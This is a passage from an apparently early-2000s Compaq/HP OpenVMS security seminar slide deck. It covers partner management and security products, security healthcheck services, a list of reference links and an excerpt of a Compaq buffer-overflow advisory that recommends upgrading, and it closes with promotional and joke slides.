POLYCENTER Scheduler → ISE EnterpriseSchedule (http://www.i-s-e.com)
Data/Database Conversion: ATTUNITY (http://www.attunity.com)
ARGENT MVP Scheduler (http://www.jams.argent-software.com)
Security Audit: POINT SECURE System Detective (http://www.pointsecure.com)
DVD/CD/CDR/WORM/Optical: U.S. Design for OpenVMS (http://www.usdesign.com)

BMC Software Alliance
• OpenVMS/BMC Technology & Marketing agreement in place for 1 year
• Joint development effort has integrated an OpenVMS data collector for BMC Patrol Perform & Predict
– Offering consistent reporting & analysis of Disk I/O, Process, Cluster Configuration, System Parameter & Performance Metrics
– Delivers improved problem analysis & more accurate capacity planning than OpenVMS Monitor data
– Supports enhanced workload analysis for a business-centric view of OpenVMS resource requirements
• BMC Software has made significant investment to bring OpenVMS up to parity with Unix and MS Windows product offerings

BMC Software Cont’d
• OpenVMS lab testing for BMC Patrol for OpenVMS
– Gains in CPU utilization efficiencies implemented
• Improved BMC OpenVMS release schedule
– Patrol for OpenVMS V2.4 – January 2002
– Patrol Perform & Predict V4.5 – April 2002
– Patrol for OpenVMS V2.5 – planned June 2002
• BMC OpenVMS functional improvements:
– Enterprise management station for all Compaq platforms
– Improved user interface for menu selection
– Additional information on process resource utilization
– More accurate data analysis on a native OpenVMS platform
– Enhanced security for Patrol for OpenVMS (SSL, 5 security levels, etc.)

BMC Software Cont’d
• BMC TDI ConsoleWorks integration for OpenVMS
– TDI ConsoleWorks now certified by BMC on the Patrol console
– TDI to map console events to BMC Patrol Console Manager
– TDI to become re-seller of BMC products
• Free trial downloads of the Patrol for OpenVMS solution available on the BMC Software web site
• TDC data collector download: www.openvms.compaq.com/openvms/products/tdc/index.html

Computer Associates Update
• CA’s portfolio of products running on OpenVMS contains:
– Unicenter brand of enterprise management products
– eTrust brand of security products
– BrightStor brand of storage products
– Advantage brand of data management products, including the Ingres database
• CA OpenVMS solutions have gone through a re-branding

POLYCENTER Evolution on OpenVMS – with Unicenter Branded Modular Solutions
POLYCENTER Performance Advisor, Data Collector, Accounting Chargeback → Unicenter Performance Management for OpenVMS
POLYCENTER Console Manager → Unicenter Console Management for OpenVMS
POLYCENTER System Watchdog → Unicenter System Watchdog for OpenVMS
POLYCENTER Scheduler → Unicenter Job Management for OpenVMS

Security Services
OpenVMS Security Services

Security healthchecks with tools from PointSecure
Security Healthcheck Service for OpenVMS (SHSO)
• A full services-led OpenVMS security review utilizing HP services & assessment tools
• Generates a report on the state of system security
Security Self-Check for OpenVMS (SSCO)
• Customer self-check
– PointAudit
– System Detective
– SAT
• Implementation, training & support provided through HP Services
• Customer keeps the tools

Recent Security Automation
Large hospital environment with 388,845 logins/month
Challenge:
• to automate a manual security process
• tools which adhere to today’s best practice
• flexibility for assisting with HIPAA compliance
Solution: Point Audit and System Detective from PointSecure, an OpenVMS-only software partner

Enhancing security with SyntheSys
JabCast Secure Realtime Communications (SRC)
Secure real-time interactive text, file and document exchange across multiple operating systems.
The idSURE Card™
A biometric crypto-processing smart card integrated with a Public Key Infrastructure (PKI), digital signatures, and a Trust Center.
-available today on IP interface
-Available July on OpenVMS machine hardware interfaces

Compaq Services
Security Service Descriptions
Security Policy development
Security Policy deployment
System Health Check
System Detective Installation
Remote Security Monitoring
Smart Card Installation/Deployment
Security Audit of Your Site
Wireless Audit of Your Site
Compaq can help with as much or as little security assistance as you need.

If you are interested in VMS security
http://www.dfwcug.org/ Quadwords Newsletter
http://vmsone.com/ Rabid VMS stuff
http://www.cert.org/ Security advisories
http://cve.mitre.org/cve/ Security advisories
http://www.support.compaq.com/patches/mailing-list.shtml
http://pulhas.org/xploits/ System Holes since 1996;-)
http://manson.vistech.net/ht_root/Hack-VMS-faq Doc cypher VMS FAQ

Patch mailing list: http://www.support.compaq.com/patches/mailing-list.shtml
Subject: [Advisory] SSRT0766 Potential Buffer Overflow for Compaq Insight Manager XE (only)
Date: Mon, 29 Oct 2001 15:28:54 -0700
From: "Boren, Rich (SSRT)" <[email protected]>
Reply-To: "Security Patch Mailing List" <[email protected]>
To: "Security Patch Mailing List" <[email protected]>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
NO RESTRICTION FOR DISTRIBUTION PROVIDED THE ADVISORY REMAINS INTACT
TITLE: (SSRT0766) Potential Security Vulnerability Compaq Insight Manager XE Software
SOURCE: Software Security Response Team U.S. Compaq Computer Corporation *Reference SSRT0766* * x-ref SSRT0758*
Date: October 29, 2001
(c) Copyright 2001 Compaq Computer Corporation. All rights reserved.
PATCHES SUPERSEDED BY THIS ADVISORY: None
"Compaq is broadly distributing this Security Advisory in order to bring to the attention of users of Compaq products the----
Summary
Compaq Management Software products undergo rigorous quality assurance processes to ensure that they meet the highest possible standards for security, reliability and usability. In line with this commitment, Compaq recently uncovered a potential buffer overflow security vulnerability in its SNMP and DMI support within Compaq Insight Manager XE. This vulnerability has the potential to enable unauthorized users to execute code at an administrator level through the exploitation of a buffer overflow. Compaq has addressed this issue with version 2.1c of Compaq Insight Manager XE and the recently announced Compaq Insight Manager 7. Compaq strongly recommends that customers upgrade to version 2.1c or Compaq Insight Manager 7.
Compaq strongly recommends that management agents and Compaq Insight Manager XE be deployed only on private networks and not used on the open Internet or on systems outside the bounds of the firewall. The implementation of sound security practices, which includes disabling external access to Compaq management ports, should help protect customers from external malicious attacks. Compaq also recommends that strong password standards are used and that passwords are changed regularly.

OpenVMS Security Seminar
Q&A

VMS: when computer failure is not an option!
Mitnick can’t hack VMS
Bin Laden can’t take out VMS
And not one of the 70,000+ viruses ever to roam the internet has ever infected or corrupted an OpenVMS system.
That’s why after 25 years, companies still use and trust OpenVMS.
And now it’s your move for computer security…

The Fine Print
Copyright 2002 Hewlett Packard Corporation All rights reserved.
While Compaq believes the information included in this presentation is correct as of the date produced, it is subject to change without notice.
All trademarks and registered trademarks are the property of their respective holders. Itanium™ and IA-64™ are trademarks of Intel.
Presentation void where taxed or prohibited by law.
Recommended for technical and engineering ranks ages 12 and up. Ask for special pointy-haired-boss toy.
Do not taunt Happy Fun Ball.
Known Glaze-on hazard, please keep this and all other similar presentations away from known-sensitive members of engineering, marketing and management.